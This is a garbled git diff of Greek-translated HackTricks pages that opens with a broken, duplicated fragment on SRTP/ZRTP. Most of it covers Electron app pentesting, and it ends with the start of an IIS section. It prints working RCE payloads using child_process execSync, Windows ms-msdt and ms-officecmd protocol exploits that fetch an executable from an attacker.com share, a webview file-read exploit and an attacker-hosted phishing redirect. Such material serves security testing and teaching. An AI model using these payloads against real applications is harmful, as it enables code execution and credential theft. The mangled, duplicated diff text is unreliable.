3. **SRTP (Ασφαλές Πρωτόκολλο Μεταφοράς Πραγματικού Χρόνου)**: Το SRTP είναι μια επέκταση του RTP που παρέχει **κρυπτογράφηση**, **επαλήθευση μηνύματος** και **προστασία από επανάληψη** για τις ροές μέσων, εξασφαλίζοντας την ασφαλή μετάδοση ευαίσθητων δεδομένων ήχου και βίντεο. Ορίζεται στο **RFC 3711**, το SRTP χρησιμοποιεί κρυπτογραφικούς αλγόριθμους όπως το AES για κρυπτογράφηση και το HMAC-SHA1 για επαλήθευση μηνύματος. Το SRTP χρησιμοποιείται συχνά σε συνδυασμό με ασφαλή πρωτόκολλα σήμανσης όπως το SIP μέσω TLS για να παρέχει ασφάλεια από άκρο σε άκρο στην πολυμεσική επικοινωνία.
|
||||
4. **ZRTP (Πρωτόκολλο Μεταφοράς Πραγματικού Χρόνου Zimmermann)**: Το ZRTP είναι ένα κρυπτογραφικό πρωτόκολλο συμφωνίας κλειδιών που παρέχει **κρυπτογράφηση άκρο προς άκρο** για τις ροές μέσων RTP. Αναπτύχθηκε από τον Phil Zimmermann, τον δημιουργό του PGP, το ZRTP περιγράφεται στο **RFC 6189**. Αντίθετα με το SRTP, που βασίζεται σε πρωτόκολλα σήμανσης για την ανταλλαγή κλειδιών, το ZRTP σχεδιάστηκε να λειτουργεί ανεξάρτητα από το πρωτόκολλο σήμανσης. Χρησιμοποιεί την **συμφωνία κλειδιών Diffie-Hellman** για να καθιερώσει ένα κοινό μυστικό μεταξύ των επικοινωνούντων μερών, χωρίς την ανάγκη προηγο
|
||||
4. **ZRTP (Πρωτόκολλο Μεταφοράς Πραγματικού Χρόνου Zimmermann)**: Το ZRTP είναι ένα κρυπτογραφικό πρωτόκολλο συμφωνίας κλειδιών που παρέχει **κρυπτογράφηση άκρο προς άκρο** για τις ροές μέσων RTP. Αναπτύχθηκε από τον Phil Zimmermann, τον δημιουργό του PGP, το ZRTP περιγράφεται στο **RFC 6189**. Αντίθετα με το SRTP, που βασίζεται σε πρωτόκολλα σήμανσης για την ανταλλαγή κλειδιών, το ZRTP σχεδιάστηκε να λειτουργεί ανεξάρτητα από το πρωτόκολλο σήμανσης. Χρησιμοποιεί την **συμφωνία κλειδιών Diffie-Hellman** για να καθιερώσει ένα κοινό μυστικό μεταξύ των επικοινωνούντων μερών, χωρίς να απαιτεί προηγούμεν
|
||||
|
|
|
@ -9,20 +9,20 @@
|
|||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -46,11 +46,11 @@ npx asar extract-file app.asar main.js #Extract just a file
|
|||
Το Electron έχει 2 τύπους διεργασιών:
|
||||
|
||||
* Κύρια Διεργασία (έχει πλήρη πρόσβαση στο NodeJS)
|
||||
* Διεργασία Αποδότη (θα πρέπει να έχει περιορισμένη πρόσβαση στο NodeJS για λόγους ασφαλείας)
|
||||
* Διεργασία Απεικονιστή (θα πρέπει να έχει περιορισμένη πρόσβαση στο NodeJS για λόγους ασφαλείας)
|
||||
|
||||
![](<../../../.gitbook/assets/image (179).png>)
|
||||
|
||||
Μια **διεργασία αποδότη** θα είναι ένα παράθυρο περιήγησης που φορτώνει ένα αρχείο:
|
||||
Μια **διεργασία απεικονιστή** θα είναι ένα παράθυρο περιήγησης που φορτώνει ένα αρχείο:
|
||||
```javascript
|
||||
const {BrowserWindow} = require('electron');
|
||||
let win = new BrowserWindow();
|
||||
|
@ -58,18 +58,18 @@ let win = new BrowserWindow();
|
|||
//Open Renderer Process
|
||||
win.loadURL(`file://path/to/index.html`);
|
||||
```
|
||||
Οι ρυθμίσεις της διαδικασίας **renderer process** μπορούν να **διαμορφωθούν** στη διαδικασία **main process** μέσα στο αρχείο main.js. Κάποιες από τις ρυθμίσεις θα **εμποδίσουν την εφαρμογή Electron να λάβει RCE** ή άλλες ευπάθειες αν οι **ρυθμίσεις είναι διαμορφωμένες σωστά**.
|
||||
Οι ρυθμίσεις της **διερμηνευτικής διαδικασίας** μπορούν να **διαμορφωθούν** στη **κύρια διεργασία** μέσα στο αρχείο main.js. Κάποιες από τις ρυθμίσεις θα **εμποδίσουν την εφαρμογή Electron να λάβει RCE** ή άλλες ευπάθειες αν οι **ρυθμίσεις είναι διαμορφωμένες σωστά**.
|
||||
|
||||
Η εφαρμογή Electron **μπορεί να έχει πρόσβαση στη συσκευή** μέσω των Node apis αν και μπορεί να ρυθμιστεί για να το αποτρέψει:
|
||||
Η εφαρμογή Electron **μπορεί να έχει πρόσβαση στη συσκευή** μέσω των διεργασιών του Node, αν και μπορεί να ρυθμιστεί για να το αποτρέψει:
|
||||
|
||||
* **`nodeIntegration`** - είναι `off` από προεπιλογή. Αν είναι ενεργοποιημένο, επιτρέπει την πρόσβαση σε λειτουργίες του Node από τη διαδικασία renderer.
|
||||
* **`contextIsolation`** - είναι `on` από προεπιλογή. Αν είναι απενεργοποιημένο, οι κύριες και οι διαδικασίες renderer δεν είναι απομονωμένες.
|
||||
* **`nodeIntegration`** - είναι `off` από προεπιλογή. Αν είναι ενεργοποιημένο, επιτρέπει την πρόσβαση σε χαρακτηριστικά του Node από τη διερμηνευτική διαδικασία.
|
||||
* **`contextIsolation`** - είναι `on` από προεπιλογή. Αν είναι απενεργοποιημένο, οι κύριες και οι διερμηνευτικές διαδικασίες δεν είναι απομονωμένες.
|
||||
* **`preload`** - κενό από προεπιλογή.
|
||||
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - είναι απενεργοποιημένο από προεπιλογή. Θα περιορίσει τις ενέργειες που μπορεί να εκτελέσει το NodeJS.
|
||||
* Node Integration σε Workers
|
||||
* Ενσωμάτωση του Node σε Εργαζόμενους
|
||||
* **`nodeIntegrationInSubframes`** - είναι `off` από προεπιλογή.
|
||||
* Αν το **`nodeIntegration`** είναι **ενεργοποιημένο**, αυτό θα επιτρέψει τη χρήση των **Node.js APIs** σε ιστοσελίδες που φορτώνονται σε iframes μέσα σε μια εφαρμογή Electron.
|
||||
* Αν το **`nodeIntegration`** είναι **απενεργοποιημένο**, τότε τα preloads θα φορτώνονται στο iframe.
|
||||
* Αν το **`nodeIntegration`** είναι **ενεργοποιημένο**, αυτό θα επιτρέψει τη χρήση των **API του Node.js** σε ιστοσελίδες που φορτώνονται σε iframes μέσα σε μια εφαρμογή Electron.
|
||||
* Αν το **`nodeIntegration`** είναι **απενεργοποιημένο**, τότε τα προ-φορτώσεις θα φορτώνονται στο iframe
|
||||
|
||||
Παράδειγμα διαμόρφωσης:
|
||||
```javascript
|
||||
|
@ -97,7 +97,7 @@ spellcheck: true
|
|||
}
|
||||
};
|
||||
```
|
||||
Μερικά **RCE payloads** από [εδώ](https://7as.es/electron/nodeIntegration\_rce.txt):
|
||||
Μερικά **φορτία RCE** από [εδώ](https://7as.es/electron/nodeIntegration\_rce.txt):
|
||||
```html
|
||||
Example Payloads (Windows):
|
||||
<img src=x onerror="alert(require('child_process').execSync('calc').toString());">
|
||||
|
@ -117,7 +117,7 @@ Example Payloads (Linux & MacOS):
|
|||
```
|
||||
## Ενσωμάτωση Τοπικού Κώδικα στο Electron
|
||||
|
||||
Εάν μπορείτε να εκτελέσετε τοπικά μια εφαρμογή Electron, είναι δυνατόν να την κάνετε να εκτελέσει αυθαίρετο κώδικα JavaScript. Ελέγξτε πώς μπορείτε να το κάνετε αυτό:
|
||||
Εάν μπορείτε να εκτελέσετε τοπικά μια εφαρμογή Electron, είναι δυνατόν να την κάνετε να εκτελέσει αυθαίρετο κώδικα JavaScript. Ελέγξτε πώς στο:
|
||||
|
||||
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md" %}
|
||||
[macos-electron-applications-injection.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
|
||||
|
@ -174,12 +174,12 @@ runCalc();
|
|||
|
||||
## RCE: XSS + contextIsolation
|
||||
|
||||
Το _**contextIsolation**_ εισάγει τα **ξεχωριστά περιβάλλοντα μεταξύ των scripts της ιστοσελίδας και του εσωτερικού κώδικα JavaScript του Electron** έτσι ώστε η εκτέλεση του JavaScript κάθε κώδικα να μην επηρεάζει τον άλλο. Αυτό είναι ένα απαραίτητο χαρακτηριστικό για την εξάλειψη της δυνατότητας RCE.
|
||||
Το _**contextIsolation**_ εισάγει τα **ξεχωριστά περιβάλλοντα μεταξύ των scripts της ιστοσελίδας και του εσωτερικού κώδικα JavaScript του Electron** ώστε η εκτέλεση του JavaScript κάθε κώδικα να μην επηρεάζει τον άλλο. Αυτό είναι ένα απαραίτητο χαρακτηριστικό για την εξάλειψη της δυνατότητας RCE.
|
||||
|
||||
Αν τα περιβάλλοντα δεν είναι απομονωμένα, ένας επιτιθέμενος μπορεί:
|
||||
|
||||
1. Να εκτελέσει **οποιοδήποτε JavaScript στον renderer** (XSS ή πλοήγηση σε εξωτερικές ιστοσελίδες)
|
||||
2. Να **αντικαταστήσει την ενσωματωμένη μέθοδο** που χρησιμοποιείται στο preload ή στον εσωτερικό κώδικα του Electron με τη δική του λειτουργία
|
||||
2. Να **αντικαταστήσει την ενσωματωμένη μέθοδο** που χρησιμοποιείται στο preload ή στον εσωτερικό κώδικα του Electron με δική του λειτουργία
|
||||
3. Να **ενεργοποιήσει** τη χρήση της **αντικατασταθείσας λειτουργίας**
|
||||
4. RCE?
|
||||
|
||||
|
@ -199,7 +199,7 @@ runCalc();
|
|||
|
||||
### Παράκαμψη συμβάντος κλικ
|
||||
|
||||
Αν υπάρχουν περιορισμοί που εφαρμόζονται όταν κάνετε κλικ σε ένα σύνδεσμο, μπορείτε να τους παρακάμψετε **κάνοντας κλικ με το κουμπί μεσαίου κλικ** αντί για ένα κανονικό αριστερό κλικ
|
||||
Αν υπάρχουν περιορισμοί που εφαρμόζονται όταν κάνετε κλικ σε ένα σύνδεσμο, μπορείτε να τους παρακάμψετε **κάνοντας κλικ με το κέντρο** αντί για ένα κανονικό αριστερό κλικ
|
||||
```javascript
|
||||
window.addEventListener('click', (e) => {
|
||||
```
|
||||
|
@ -207,14 +207,14 @@ window.addEventListener('click', (e) => {
|
|||
|
||||
Για περισσότερες πληροφορίες σχετικά με αυτά τα παραδείγματα ελέγξτε [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) και [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
|
||||
|
||||
Κατά την ανάπτυξη μιας εφαρμογής επιφάνειας εργασίας Electron, είναι ζωτικής σημασίας η διασφάλιση των σωστών ρυθμίσεων για το `nodeIntegration` και το `contextIsolation`. Έχει επιβεβαιωθεί ότι η **εκτέλεση κώδικα απομακρυσμένα (RCE)** προς τα preload scripts ή τον φυσικό κώδικα του Electron από την κύρια διαδικασία αποτρέπεται αποτελεσματικά με αυτές τις ρυθμίσεις σε ισχύ.
|
||||
Κατά την ανάπτυξη μιας εφαρμογής Electron desktop, είναι κρίσιμο να διασφαλιστούν οι σωστές ρυθμίσεις για το `nodeIntegration` και το `contextIsolation`. Έχει επιβεβαιωθεί ότι η **εκτέλεση κώδικα απομακρυσμένα (RCE)** προς τα preload scripts ή τον φυσικό κώδικα του Electron από την κύρια διεργασία αποτρέπεται αποτελεσματικά με αυτές τις ρυθμίσεις σε ισχύ.
|
||||
|
||||
Κατά τη διάρκεια της αλληλεπίδρασης ενός χρήστη με συνδέσμους ή το άνοιγμα νέων παραθύρων, ενεργοποιούνται συγκεκριμένοι ακροατές συμβάντων, οι οποίοι είναι κρίσιμοι για την ασφάλεια και τη λειτουργικότητα της εφαρμογής:
|
||||
Κατά την αλληλεπίδραση ενός χρήστη με συνδέσμους ή με το άνοιγμα νέων παραθύρων, ενεργοποιούνται συγκεκριμένοι ακροατές συμβάντων, οι οποίοι είναι κρίσιμοι για την ασφάλεια και τη λειτουργικότητα της εφαρμογής:
|
||||
```javascript
|
||||
webContents.on("new-window", function (event, url, disposition, options) {}
|
||||
webContents.on("will-navigate", function (event, url) {}
|
||||
```
|
||||
Αυτοί οι ακροατές **αντικαθίστανται από την εφαρμογή επιφάνειας εργασίας** για την υλοποίηση της **επιχειρηματικής λογικής** της. Η εφαρμογή αξιολογεί εάν ένας πλοηγούμενος σύνδεσμος πρέπει να ανοίξει εσωτερικά ή σε εξωτερικό πρόγραμμα περιήγησης στον ιστό. Αυτή η απόφαση καθορίζεται συνήθως μέσω μιας συνάρτησης, `openInternally`. Εάν αυτή η συνάρτηση επιστρέφει `false`, υποδηλώνει ότι ο σύνδεσμος πρέπει να ανοίξει εξωτερικά, χρησιμοποιώντας τη συνάρτηση `shell.openExternal`.
|
||||
Αυτοί οι ακροατές **αντικαθίστανται από την εφαρμογή επιφάνειας εργασίας** για την υλοποίηση της **επιχειρηματικής λογικής** της. Η εφαρμογή αξιολογεί εάν ένας πλοηγούμενος σύνδεσμος πρέπει να ανοίξει εσωτερικά ή σε έναν εξωτερικό περιηγητή ιστού. Αυτή η απόφαση καθορίζεται συνήθως μέσω μιας συνάρτησης, `openInternally`. Εάν αυτή η συνάρτηση επιστρέφει `false`, υποδηλώνει ότι ο σύνδεσμος πρέπει να ανοίξει εξωτερικά, χρησιμοποιώντας τη συνάρτηση `shell.openExternal`.
|
||||
|
||||
**Εδώ υπάρχει απλοποιημένο ψευδοκώδικα:**
|
||||
|
||||
|
@ -224,7 +224,7 @@ webContents.on("will-navigate", function (event, url) {}
|
|||
|
||||
Οι βέλτιστες πρακτικές ασφαλείας του Electron JS συνιστούν να μην γίνεται δεκτό μη αξιόπιστο περιεχόμενο με τη συνάρτηση `openExternal`, καθώς αυτό θα μπορούσε να οδηγήσει σε RCE μέσω διαφόρων πρωτοκόλλων. Τα λειτουργικά συστήματα υποστηρίζουν διαφορετικά πρωτόκολλα που ενδέχεται να ενεργοποιήσουν RCE. Για λεπτομερείς παραδείγματα και περαιτέρω εξήγηση σχετικά με αυτό το θέμα, μπορεί κάποιος να ανατρέξει σε [αυτό τον πόρο](https://positive.security/blog/url-open-rce#windows-10-19042), ο οποίος περιλαμβάνει παραδείγματα πρωτοκόλλων των Windows που μπορούν να εκμεταλλευτούν αυτήν την ευπάθεια.
|
||||
|
||||
**Παραδείγματα εκμετάλλευσης πρωτοκόλλων Windows περιλαμβάνουν:**
|
||||
**Παραδείγματα εκμετάλλευσης πρωτοκόλλων των Windows περιλαμβάνουν:**
|
||||
```html
|
||||
<script>
|
||||
window.open("ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22")
|
||||
|
@ -240,7 +240,7 @@ window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResu
|
|||
```
|
||||
## Ανάγνωση Εσωτερικών Αρχείων: XSS + contextIsolation
|
||||
|
||||
**Η απενεργοποίηση του `contextIsolation` επιτρέπει τη χρήση των ετικετών `<webview>`,** παρόμοια με την `<iframe>`, για την ανάγνωση και εξυφάντωση τοπικών αρχείων. Ένα παράδειγμα που παρέχεται δείχνει πώς να εκμεταλλευτείτε αυτήν την ευπάθεια για την ανάγνωση των περιεχομένων εσωτερικών αρχείων:
|
||||
**Η απενεργοποίηση του `contextIsolation` επιτρέπει τη χρήση των ετικετών `<webview>`,** παρόμοια με τις `<iframe>`, για την ανάγνωση και εξυφάντωση τοπικών αρχείων. Ένα παράδειγμα παρέχει τον τρόπο εκμετάλλευσης αυτής της ευπάθειας για την ανάγνωση των περιεχομένων εσωτερικών αρχείων:
|
||||
|
||||
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf_F2ttJg (1).png>)
|
||||
|
||||
|
@ -262,14 +262,14 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body
|
|||
|
||||
Υποθέτοντας ότι βρήκατε ένα XSS αλλά δεν μπορείτε να ενεργοποιήσετε RCE ή να κλέψετε εσωτερικά αρχεία, μπορείτε να προσπαθήσετε να το χρησιμοποιήσετε για να **κλέψετε διαπιστευτήρια μέσω phishing**.
|
||||
|
||||
Καταρχάς, πρέπει να γνωρίζετε τι συμβαίνει όταν προσπαθείτε να ανοίξετε ένα νέο URL, ελέγχοντας τον κώδικα JS στο front-end:
|
||||
Καταρχάς, πρέπει να γνωρίζετε τι συμβαίνει όταν προσπαθείτε να ανοίξετε ένα νέο URL, ελέγχοντας τον κώδικα JS στο μέτωπο:
|
||||
```javascript
|
||||
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
|
||||
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
|
||||
```
|
||||
Η κλήση στο **`openInternally`** θα αποφασίσει εάν το **σύνδεσμος** θα **ανοίξει** στο **παράθυρο της επιφάνειας εργασίας** καθώς ανήκει στην πλατφόρμα, **ή** αν θα ανοίξει στο **πρόγραμμα περιήγησης ως πόρος τρίτου μέρους**.
|
||||
Η κλήση στο **`openInternally`** θα αποφασίσει εάν το **σύνδεσμος** θα **ανοίξει** στο **παράθυρο της επιφάνειας εργασίας** ως σύνδεσμος που ανήκει στην πλατφόρμα, **ή** αν θα ανοίξει στο **πρόγραμμα περιήγησης ως πόρος τρίτου μέρους**.
|
||||
|
||||
Στην περίπτωση που το **regex** που χρησιμοποιείται από τη συνάρτηση είναι **ευάλωτο σε παρακάμψεις** (για παράδειγμα μην **αποδράσει τα τελεία των υποτομέων**) ένας επιτιθέμενος θα μπορούσε να εκμεταλλευτεί το XSS για να **ανοίξει ένα νέο παράθυρο το οποίο** θα βρίσκεται στη υποδομή του επιτιθέμενου **ζητώντας διαπιστευτήρια** από τον χρήστη:
|
||||
Στην περίπτωση που το **regex** που χρησιμοποιείται από τη συνάρτηση είναι **ευάλωτο σε παρακάμψεις** (για παράδειγμα μην **αποδράσει τα τελεία των υποτομέων**) ένας επιτιθέμενος θα μπορούσε να καταχραστεί το XSS για να **ανοίξει ένα νέο παράθυρο το οποίο** θα βρίσκεται στη υποδομή του επιτιθέμενου **ζητώντας διαπιστευτήρια** από τον χρήστη:
|
||||
```html
|
||||
<script>
|
||||
window.open("<http://subdomainagoogleq.com/index.html>")
|
||||
|
@ -277,7 +277,7 @@ window.open("<http://subdomainagoogleq.com/index.html>")
|
|||
```
|
||||
## **Εργαλεία**
|
||||
|
||||
* [**Electronegativity**](https://github.com/doyensec/electronegativity) είναι ένα εργαλείο για την αναγνώριση λανθασμένων ρυθμίσεων και αντι-προτύπων ασφάλειας σε εφαρμογές βασισμένες σε Electron.
|
||||
* [**Electronegativity**](https://github.com/doyensec/electronegativity) είναι ένα εργαλείο για την αναγνώριση λανθασμένων ρυθμίσεων και αντι-προτύπων ασφάλειας σε εφαρμογές που βασίζονται σε Electron.
|
||||
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) είναι ένα πρόσθετο του VS Code για εφαρμογές Electron που χρησιμοποιεί το Electronegativity.
|
||||
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) για έλεγχο ευπαθών βιβλιοθηκών τρίτων
|
||||
* [**Electro.ng**](https://electro.ng/): Πρέπει να το αγοράσετε
|
||||
|
@ -319,13 +319,13 @@ npm start
|
|||
* Περισσότερες έρευνες και αναλύσεις σχετικά με την ασφάλεια του Electron στο [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
|
||||
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -337,7 +337,7 @@ npm start
|
|||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
|
|
@ -2,21 +2,21 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης των HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στα HackTricks** ή να **κατεβάσετε τα HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
|
@ -28,7 +28,7 @@
|
|||
|
||||
---
|
||||
|
||||
Δοκιμάστε επεκτάσεις αρχείων εκτελέσιμων αρχείων:
|
||||
Δοκιμάστε τις επεκτάσεις αρχείων εκτελέσιμων αρχείων:
|
||||
|
||||
* asp
|
||||
* aspx
|
||||
|
@ -37,7 +37,7 @@
|
|||
|
||||
## Αποκάλυψη Εσωτερικής Διεύθυνσης IP
|
||||
|
||||
Σε οποιονδήποτε διακομιστή IIS όπου λάβετε έναν κωδικό 302, μπορείτε να δοκιμάσετε να αφαιρέσετε την κεφαλίδα Host και να χρησιμοποιήσετε HTTP/1.0 και μέσα στην απάντηση η κεφαλίδα Τοποθεσία μπορεί να σας οδηγήσει στην εσωτερική διεύθυνση IP:
|
||||
Σε οποιονδήποτε διακομιστή IIS όπου λαμβάνετε έναν κωδικό 302, μπορείτε να δοκιμάσετε να αφαιρέσετε την κεφαλίδα Host και να χρησιμοποιήσετε το HTTP/1.0 και μέσα στην απάντηση η κεφαλίδα Τοποθεσία μπορεί να σας κατευθύνει στην εσωτερική διεύθυνση IP:
|
||||
```
|
||||
nc -v domain.com 80
|
||||
